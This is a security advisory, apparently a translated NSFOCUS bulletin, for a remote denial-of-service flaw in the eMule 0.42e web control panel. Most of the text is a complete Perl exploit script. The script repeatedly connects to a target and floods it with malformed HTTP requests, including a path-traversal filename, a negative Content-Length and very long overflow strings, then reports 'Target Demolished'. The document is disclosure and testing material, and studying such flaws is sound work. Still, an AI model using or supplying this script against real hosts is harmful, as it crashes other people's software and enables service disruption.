eMule Web Control Panel Remote Denial of Service Vulnerability

Published: 2004-05-10
Updated: 2004-05-14

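Affected systems:
Emule Emule 0.42e
Description:
BUGTRAQ  ID: 10317

eMule is a reliable peer-to-peer file-sharing client.

The eMule Web control panel does not handle malformed requests correctly. A remote attacker can exploit this vulnerability to cause a denial of service in the application.

Submitting a malformed GET request can crash the eMule application.

<*Source: Rafel Ivgi, The-Insider (nuritrv18@bezeqint.net)
  *>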

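Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use it at your own risk!

Rafel Ivgi, The-Insider (nuritrv18@bezeqint.net) provided the following test method: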

#!/usr/bin/perl

system("cls");
# Emule 0.42e Remote Denial Of Service Exploit
# Coded by Rafel Ivgi, The-Insider:   http://theinsider.deep-ice.com
# usage: perl emule042e.pl <host> <port> <how many times>

use IO::Socket;
my $host = $ARGV[0];
my $port = $ARGV[1];
my $times = $ARGV[2];

if ($host)
{
unless($port) { $port="4711";}
unless($times) { $times="50";}
{
                print "Emule 0.42e Remote Denial Of Service Exploit
           Coded by The-Insider\n\n";
                print "[+] Connecting to target $host:$port\n";
for $i (1..$times) {
                $remote=IO::Socket::INET->new(Proto =>"tcp",
  PeerAddr => $host,
  PeerPort =>  80,
                                    Type => SOCK_STREAM
                                    Timeout => 8);

unless ($remote)
                  {
                  die "can't connect to $host"
                  }
                  print "[+] Connected to target $host:$port\n";
                  print "[+] Sending Request\n";
$remote ->autoflush(1);
print $remote "GET / HTTP/1.1
Content-Disposition: form-data; name=\"file\";
filename=\"../../../file.txt\"

";
print $remote "POST / HTTP/1.0
Content-Length: 10

123456789

";
print $remote "POST / HTTP/1.1
Content-Length: -1

";
print $remote "GET /%%%%%%%%%%%% HTTP/1.0

";
print $remote "index.htm

";
print $remote "GET
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1

";
print $remote "GET
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa

";
print $remote "GET c:\

";
                  print $remote "GET
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1

";
                  while(<$remote>)
                  {
                  $cool .= $_;
if ($cool =~ /Server:/i)
                  {
                  close $cool;
                 -close $remote;
                  }
                  }
                  print "[+] Target Demolished.\n";
}}}
else
{
die "\nEmule 0.42e Remote Denial Of Service Exploit
Coded by Rafel Ivgi, The-Insider:   http://theinsider.deep-ice.com


usage: perl emule042e.pl <host> <port> <how many times>\n\n";
}

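Recommendation:
Vendor patch:

Emule
-----
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: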

http://emule-project.net/

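This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.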